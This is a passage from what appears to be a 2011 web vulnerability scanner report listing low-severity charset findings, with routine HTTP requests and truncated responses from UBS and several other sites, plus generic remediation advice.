User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:39 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 59719
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.16. https://www2.ubs.com/1/f/contact/locations.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/f/contact/locations.html

Request

GET /1/f/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:24 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 35793
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="fr">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.17. https://www2.ubs.com/1/g/contact/locations.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/g/contact/locations.html

Request

GET /1/g/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:20 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 35287
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="de">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.18. https://www2.ubs.com/1/g/contact/order.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/g/contact/order.html

Request

GET /1/g/contact/order.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:18 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 51770
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="de">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.19. https://www2.ubs.com/1/i/contact/locations.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/i/contact/locations.html

Request

GET /1/i/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:29 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 35625
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="it">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.20. https://www2.ubs.com/1/ssl/e/contact/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/ssl/e/contact/contact.html

Request

GET /1/ssl/e/contact/contact.html?NavLB_Www=1309960260 HTTP/1.1
Host: www2.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; NavLB_Www=www2.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:02 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close
Content-Length: 51634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.21. https://www2.ubs.com/6/e/contact/locations.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /6/e/contact/locations.html

Request

GET /6/e/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:47 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 39163
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!--XSLT Template: XSLT for Accessibility/wb2xhtml_0.0.xslt--><!--XSLT extension functions: xalan--><!--Document language: en--><!--Acce
...[SNIP]...
20.22. https://www2.ubs.com/6/e/contact/order.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /6/e/contact/order.html

Request

GET /6/e/contact/order.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:45 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 52277
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 3
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><!--XSLT Template: XSLT for Accessibility/wb2xhtml_0.0.xslt--><!--XSLT extension functions: xalan--><!--Document language: en--><!--Acce
...[SNIP]...
21. HTML does not specify charset  previous  next
There are 14 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

21.1. http://seg.sharethis.com/socialOptimization.ps.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /socialOptimization.ps.js

Request

GET /socialOptimization.ps.js?campaign=RT-microsoft_ie9 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Wed, 06 Jul 2011 15:39:03 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 1396

(function(){

var __stPublisher='';var __stCampaign='RT-microsoft_ie9';
function createRetargetSegmentFrame(){
   var segmentFrame=null;
   try {
       segmentframe = document.createElement('<iframe name="str
...[SNIP]...
21.2. http://thezwsxp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: thezwsxp.com
Cookie: TestCookie=1

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:26:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 195

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
21.3. http://thezwsxp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: thezwsxp.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:19:34 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chr
...[SNIP]...
21.4. http://thezwsxp.com/img4/centralLanding.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /img4/centralLanding.css

Request

GET /img4/centralLanding.css HTTP/1.1
Host: thezwsxp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:21:18 GMT
Content-Type: text/html
Content-Length: 564
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chr
...[SNIP]...
21.5. http://thezwsxp.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /index.php

Request

GET /index.php HTTP/1.1
Host: thezwsxp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:21:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.17
Content-Length: 195

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
21.6. http://thezwsxp.com/index2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /index2.php

Request

GET /index2.php HTTP/1.1
Host: thezwsxp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:21:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.17
Content-Length: 195

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
21.7. http://thezwsxp.com/undefined  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thezwsxp.com
Path:   /undefined

Request

GET /undefined HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: thezwsxp.com

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 07 Jul 2011 06:24:39 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chr
...[SNIP]...
21.8. http://watson.microsoft.com/StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://watson.microsoft.com
Path:   /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm

Request

GET /StageOne/Generic/AppHangB1/iexplore_exe/9_0_8112_16421/4d76255d/2a83/6144.htm?LCID=1033&OS=6.1.7600.2.00030110.0.0.7.16385&SR6=0&SR5=0&SR4=0&SR3=0&SR2=0&SR1=2&SM=Xen&SPN=HVM%20domU&BV=3.4.2&MID=02B561F5-F97B-4B2F-ADF4-C485C85915EF HTTP/1.1
User-Agent: MSDW
Proxy-Connection: Keep-Alive
Host: watson.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 05 Jul 2011 06:05:21 GMT
Accept-Ranges: bytes
ETag: "0bcb385d93acc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:18:13 GMT
Content-Length: 46

Bucket=1783942133
BucketTable=5
Response=1
21.9. http://www.ravenwoodfair.com/viximo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ravenwoodfair.com
Path:   /viximo

Request

GET /viximo HTTP/1.1
Host: www.ravenwoodfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.4
Date: Wed, 06 Jul 2011 14:06:04 GMT
p3p: CP="CAO PSA OUR"
content-type: text/html
location: https://graph.facebook.com/oauth/authorize?client_id=120563477996213&redirect_uri=http%3A//www.ravenwoodfair.com/viximoauth/post_auth/email_tg%253D1&scope=email
pragma: no-cache
cache-control: no-cache
Connection: close

<html><head></head><body><script type="text/javascript">top.location.href='https://graph.facebook.com/oauth/authorize?client_id=120563477996213&redirect_uri=http%3A//www.ravenwoodfair.com/viximoauth/p
...[SNIP]...
21.10. http://www.twitvid.com/player/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitvid.com
Path:   /player/

Request

GET /player/ HTTP/1.1
Host: www.twitvid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 06 Jul 2011 13:57:51 GMT
Content-Type: text/html
Content-Length: 311
Connection: close
Set-Cookie: SERVERID=sl2; path=/

<html>
<head>
<title>The page is not found</title>
<style>
body { font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body bgcolor="white" text="black">
<table width="100%" height="10
...[SNIP]...
21.11. http://www.ubs.com/1/e/index/siterating.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/e/index/siterating.html

Request

GET /1/e/index/siterating.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:55 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:54 GMT
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 10485
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>

<head>

<title></title>

<link
...[SNIP]...
21.12. http://www.ubs.com/2/e/quotes_help/ubsHelp.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /2/e/quotes_help/ubsHelp.htm

Request

GET /2/e/quotes_help/ubsHelp.htm HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:02 GMT
Server: Apache
Last-Modified: Wed, 22 Jun 2011 16:30:36 GMT
ETag: "1a75b-1700-7cf68300"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 5888
Content-Type: text/html
Connection: close

<!-- Patched ACE WebHelp Utility v2.0.0 -->
<!-- saved from url=(0014)about:internet -->
<html>
<head><script language="javascript">
<!--

function gkkCloser(time) {
   window.close();
}

func
...[SNIP]...
21.13. http://www.viddyou.com/get/v2_  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viddyou.com
Path:   /get/v2_

Request

GET /get/v2_ HTTP/1.1
Host: www.viddyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 18 Jan 2010 13:04:24 GMT
ETag: "66a82d5-9f-47d6ffe0dc600"
Accept-Ranges: bytes
Content-Length: 159
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<html>
<head>
   <title>*waves*</title>
</head>
<body>
   <a href="http://www.motionbox.com/">
       <img src="viddyou_goodbye.jpg" border="0" />
   </a>
</body>
</html>
21.14. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive8.com
Path:   /1245/Visitor/vTracker_v2.asp

Request

GET /1245/Visitor/vTracker_v2.asp?websiteid=0&groupid=1245 HTTP/1.1
Host: www.websitealive8.com
Proxy-Connection: keep-alive
Referer: http://www.metricstream.com/library/Library_5.jsp?prob=Compliance%20Management
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADASDBS=ANOCIOEDOGMMJDHEPBCFJNDG

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 7795
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...
22. HTML uses unrecognised charset  previous  next
There are 8 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

22.1. http://vut8rr7o.leoptic.com/index2.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vut8rr7o.leoptic.com
Path:   /index2.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /index2.php?q=dCeCluO2jbL5TVzBPtOVJ3CXfMv2mV6gaooPNthD7nda5xIn1QEMR1Zs591LuJScDEVcs9JSCZXQTTsOF&s=110 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://adonmax.com/afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vut8rr7o.leoptic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 16:05:22 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Content-Length: 806
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
                       <html>
                        <head>
                        <meta http-equiv="content-type" content="text/html; charset=uft8">
                        <title>404 Not Fou
...[SNIP]...
22.2. http://www.tudou.com/v/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=gbk"/>
   <meta http-equiv="Content-Language" content="zh-CN" />
...[SNIP]...
22.3. http://www.ubs.com/4/legal_disclaimer/jp_disclaimer.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/jp_disclaimer.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/jp_disclaimer.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Fri, 12 Mar 2010 08:56:42 GMT
ETag: "ba3d2-7c50-b5cc8680"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 31824
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=shift_jis" />
<!-- InstanceEndEditable -->
...[SNIP]...
22.4. http://www.ubs.com/4/legal_disclaimer/ko_privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/ko_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/ko_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 09:51:32 GMT
ETag: "ba1ea-6d84-b3ed1100"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 28036
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr"/>
<!-- InstanceEndEditable -->
...[SNIP]...
22.5. http://www.ubs.com/4/legal_disclaimer/ru_privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/ru_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/ru_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:01:14 GMT
ETag: "ba1f0-7ce7-d69dae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 31975
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="/Templates/frameset.dwt" codeOutsideHTMLIs
...[SNIP]...
<!-- InstanceBeginEditable name="charset" -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-5" />
<!-- InstanceEndEditable -->
...[SNIP]...
22.6. http://www.ubs.com/4/legal_disclaimer/sc_chi_privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ubs.com
Path:   /4/legal_disclaimer/sc_chi_privacy.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /4/legal_disclaimer/sc_chi_privacy.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:00 GMT
Server: Apache
Last-Modified: Tue, 01 Dec 2009 10:10:54 GMT
